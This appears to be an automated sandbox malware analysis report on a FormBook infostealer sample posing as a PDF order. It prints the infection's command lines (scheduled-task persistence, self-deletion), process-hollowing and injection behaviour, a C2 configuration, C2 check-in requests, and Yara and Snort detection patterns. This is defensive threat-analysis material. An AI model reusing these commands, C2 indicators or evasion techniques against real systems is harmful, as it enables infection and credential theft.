Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Nuevo orden pdf.exe

Overview

General Information

Sample Name:Nuevo orden pdf.exe
Analysis ID:404237
MD5:02a32cc05efbf5236a8c0928d3c9170e
SHA1:fa3a639f15116da149b14d832b9255528f0bfe65
SHA256:5930cfa7dd5664e104c299fce83451021349922b6b02774235eae6bd14fad464
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Nuevo orden pdf.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\Nuevo orden pdf.exe' MD5: 02A32CC05EFBF5236A8C0928D3C9170E)
    • schtasks.exe (PID: 204 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6196 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6776 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Nuevo orden pdf.exe.2e5f580.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          6.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 5 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Nuevo orden pdf.exe' , ParentImage: C:\Users\user\Desktop\Nuevo orden pdf.exe, ParentProcessId: 5520, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6196

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: www.lovetarot.online/sqxs/Avira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: Nuevo orden pdf.exeJoe Sandbox ML: detected
            Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Nuevo orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Nuevo orden pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
            Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.271818263.000000000100F000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.484481118.0000000004E5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
            Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.lovetarot.online/sqxs/
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ HTTP/1.1Host: www.thefuture101.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ HTTP/1.1Host: www.mediatraining-toronto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ HTTP/1.1Host: www.bluevistainvestments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ HTTP/1.1Host: www.thefuture101.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ HTTP/1.1Host: www.mediatraining-toronto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ HTTP/1.1Host: www.bluevistainvestments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.thefuture101.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Tue, 04 May 2021 18:33:17 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 78 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p></body></html>
            Source: explorer.exe, 00000007.00000000.257802419.000000000F55B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Nuevo orden pdf.exeString found in binary or memory: http://vbcity.com/forums/t/51894.aspx
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Nuevo orden pdf.exeString found in binary or memory: https://github.com/MrCylops
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: Nuevo orden pdf.exe, 00000000.00000002.228288277.0000000001060000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A070 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A120 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F40 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419FF0 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A09A NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A11A NtAllocateVirtualMemory,
